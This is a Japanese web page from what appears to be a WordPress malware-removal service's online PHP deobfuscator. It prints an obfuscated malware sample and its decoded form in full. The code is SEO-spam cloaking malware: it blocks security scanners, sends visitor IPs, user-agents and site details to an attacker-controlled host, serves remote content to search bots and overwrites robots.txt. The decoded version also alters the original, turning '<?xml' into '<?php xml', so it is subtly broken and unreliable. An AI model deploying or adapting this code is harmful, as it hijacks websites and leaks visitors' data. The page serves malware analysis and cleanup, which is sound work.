Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $cfyk='ht';$eljo='h';$homk='cw14';$wvxi='earingtell.com/';$gbuq='tp://';$giun='60.';$jrtko=$cfyk.$gbuq.$homk.$giun.$eljo.$wvxi; $pc = "VQcBAwA"; $bagent = "Google|Yahoo|Docomo|Bing"; error_reporting(0); if(preg_match("/(petalBot|Java|Python|indy Library|mj12bot|Go-http-client|swiftbot|Jaunt...



難読化されたPHPコード

<?php $cfyk='ht';$eljo='h';$homk='cw14';$wvxi='earingtell.com/';$gbuq='tp://';$giun='60.';$jrtko=$cfyk.$gbuq.$homk.$giun.$eljo.$wvxi; $pc = "VQcBAwA"; $bagent = "Google|Yahoo|Docomo|Bing"; error_reporting(0); if(preg_match("/(petalBot|Java|Python|indy Library|mj12bot|Go-http-client|swiftbot|Jaunty|yandexBot|feedDemon|DotBot|ezooms|AskTbFXTV|HttpClient|OBot|scrapy|Barkrowler|SeznamBot|heritrix|Paloaltonetworks|AhrefsBot|Feedly|DataForSEO|EasouSpider|YySpider|digExt|python-urllib|LightDeckReports Bot|CrawlDaddy|ZmEu|CensysInspect|YisouSpider|amazonBot|SemrushBot|ApacheBench|UniversalFeedParser|Python-requests|jikeSpider|coolpadWebkit|bytespider|GPTBot)/i", $_SERVER['HTTP_USER_AGENT'])) {  header('HTTP/1.0 403 Forbidden');  exit(); } $refer = urlencode(@$_SERVER['HTTP_REFERER']); $uagent = urlencode($_SERVER['HTTP_USER_AGENT']); $language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']); $ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_CLIENT_IP'])) {  $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {  $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } $ip = urlencode($ip); $domain = urlencode($_SERVER['HTTP_HOST']); $script = urlencode($_SERVER['SCRIPT_NAME']);  if ((!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https') or (!empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') or (!empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443') or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) {  $_SERVER['REQUEST_SCHEME'] = 'https'; } else {  $_SERVER['REQUEST_SCHEME'] = 'http'; }  $http = urlencode($_SERVER['REQUEST_SCHEME']); $uri = urlencode($_SERVER['REQUEST_URI']); if(strpos($uri,"mldmld") !== false){echo "ok";exit();} $mld = 0; $mldFilePath = "mld.txt"; if(!is_file($mldFilePath)) {  $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/mldmld';  $pdjc = @file_get_contents($uuu);   if($pdjc === "ok") {   $mld = 1;   writeToFile($mldFilePath,"1");  } else {   $mld = 0;   writeToFile($mldFilePath,"0");  } } else {  $mld = readFromFile($mldFilePath); }  function writeToFile($filePath, $content) {  $file = fopen($filePath, "w");  if ($file) {  fwrite($file, $content);  fclose($file);  return true;  }  return false; }  function readFromFile($filePath) {  $file = fopen($filePath, "r");  if ($file) {  $content = fread($file, filesize($filePath));  fclose($file);  return $content;  }  return false; } if(strpos($uri,"favicon.ico") !== false) { } else if(strpos($uri,"robots.txt") !== false or strpos($uri,"pingsitemap") !== false or strpos($uri,"jp2023") !== false or preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI']) or preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])) {  $requsturl = $jrtko."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$mld&script=$script";  $robots_contents = "";  if(strpos($uri,"pingsitemap") !== false) {   $scripname = $_SERVER['SCRIPT_NAME'];   if(strpos($scripname,"index.ph") !== false) {    if($mld == 0) {     $scripname = '/?';    } else {     $scripname = '/';    }   } else {    $scripname = $scripname.'?';   }   $robots_contents = "User-agent: *\r\nAllow: /";   $sitemap = "$http://" . $domain .$scripname. "sitemap.xml";   $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap";   $sitemapstatus = "";   echo $sitemap.": ".$sitemapstatus.'<br/>';   $requsturl = $jrtko."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$mld&script=$script&sitemap=".urlencode($sitemap);  }  $pdjc = @file_get_contents($requsturl);  if(empty($pdjc)) {   $ch = curl_init();   curl_setopt($ch, CURLOPT_URL, $requsturl);   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);   $pdjc = curl_exec($ch);   curl_close($ch);  }  if(!empty($pdjc)) {   if(substr($pdjc,0,10)=="error code"||$pdjc == "500") {    header("HTTP/1.0 500 Internal Server Error");    exit();   }   if(strpos($uri,"jp2023") !== false){header('HTTP/1.1 404 Not Found');}   else if(substr($pdjc,0,5)=="<?xml") {    header('Content-Type: text/xml; charset=utf-8');   } else {    header('Content-Type: text/html; charset=utf-8');   }   echo $pdjc;   if(!empty($robots_contents)){writeToFile("robots.txt",$robots_contents);}   else if(strpos($uri,"robots.txt") !== false){writeToFile("robots.txt",$pdjc);}   exit();   return;  } }else{ }  ?>

デコード(難読化解除)されたコード

<?php

$cfyk = 'ht';
$eljo = 'h';
$homk = 'cw14';
$wvxi = 'earingtell.com/';
$gbuq = 'tp://';
$giun = '60.';
$jrtko = "http://cw1460.hearingtell.com/";
$pc = "VQcBAwA";
$bagent = "Google|Yahoo|Docomo|Bing";
error_reporting(0);
if (preg_match("/(petalBot|Java|Python|indy Library|mj12bot|Go-http-client|swiftbot|Jaunty|yandexBot|feedDemon|DotBot|ezooms|AskTbFXTV|HttpClient|OBot|scrapy|Barkrowler|SeznamBot|heritrix|Paloaltonetworks|AhrefsBot|Feedly|DataForSEO|EasouSpider|YySpider|digExt|python-urllib|LightDeckReports Bot|CrawlDaddy|ZmEu|CensysInspect|YisouSpider|amazonBot|SemrushBot|ApacheBench|UniversalFeedParser|Python-requests|jikeSpider|coolpadWebkit|bytespider|GPTBot)/i", $_SERVER['HTTP_USER_AGENT'])) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}
$refer = urlencode(@$_SERVER['HTTP_REFERER']);
$uagent = urlencode($_SERVER['HTTP_USER_AGENT']);
$language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
$ip = urlencode($ip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);
if (!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https' or !empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on' or !empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443' or isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
    $_SERVER['REQUEST_SCHEME'] = 'https';
} else {
    $_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
$uri = urlencode($_SERVER['REQUEST_URI']);
if (strpos($uri, "mldmld") !== false) {
    echo "ok";
    exit;
}
$mld = 0;
$mldFilePath = "mld.txt";
if (!is_file($mldFilePath)) {
    $uuu = $http . '://' . $_SERVER['HTTP_HOST'] . '/mldmld';
    $pdjc = @file_get_contents($uuu);
    if ($pdjc === "ok") {
        $mld = 1;
        writeToFile($mldFilePath, "1");
    } else {
        $mld = 0;
        writeToFile($mldFilePath, "0");
    }
} else {
    $mld = readFromFile($mldFilePath);
}
function writeToFile($filePath, $content)
{
    $file = fopen($filePath, "w");
    if ($file) {
        fwrite($file, $content);
        fclose($file);
        return true;
    }
    return false;
}
function readFromFile($filePath)
{
    $file = fopen($filePath, "r");
    if ($file) {
        $content = fread($file, filesize($filePath));
        fclose($file);
        return $content;
    }
    return false;
}
if (strpos($uri, "favicon.ico") !== false) {
} else {
    if (strpos($uri, "robots.txt") !== false or strpos($uri, "pingsitemap") !== false or strpos($uri, "jp2023") !== false or preg_match("@^/(.*?).xml\$@i", $_SERVER['REQUEST_URI']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_REFERER'])) {
        $requsturl = $jrtko . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$mld}&script={$script}";
        $robots_contents = "";
        if (strpos($uri, "pingsitemap") !== false) {
            $scripname = $_SERVER['SCRIPT_NAME'];
            if (strpos($scripname, "index.ph") !== false) {
                if ($mld == 0) {
                    $scripname = '/?';
                } else {
                    $scripname = '/';
                }
            } else {
                $scripname .= '?';
            }
            $robots_contents = "User-agent: *\r\nAllow: /";
            $sitemap = "{$http}://" . $domain . $scripname . "sitemap.xml";
            $robots_contents = trim($robots_contents) . "\r\n" . "Sitemap: {$sitemap}";
            $sitemapstatus = "";
            echo $sitemap . ": " . $sitemapstatus . '<br/>';
            $requsturl = $jrtko . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$mld}&script={$script}&sitemap=" . urlencode($sitemap);
        }
        $pdjc = @file_get_contents($requsturl);
        if (empty($pdjc)) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $requsturl);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
            $pdjc = curl_exec($ch);
            curl_close($ch);
        }
        if (!empty($pdjc)) {
            if (substr($pdjc, 0, 10) == "error code" || $pdjc == "500") {
                header("HTTP/1.0 500 Internal Server Error");
                exit;
            }
            if (strpos($uri, "jp2023") !== false) {
                header('HTTP/1.1 404 Not Found');
            } else {
                if (substr($pdjc, 0, 5) == "<?php xml") {
                    header('Content-Type: text/xml; charset=utf-8');
                } else {
                    header('Content-Type: text/html; charset=utf-8');
                }
            }
            echo $pdjc;
            if (!empty($robots_contents)) {
                writeToFile("robots.txt", $robots_contents);
            } else {
                if (strpos($uri, "robots.txt") !== false) {
                    writeToFile("robots.txt", $pdjc);
                }
            }
            exit;
        }
    } else {
    }
}

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.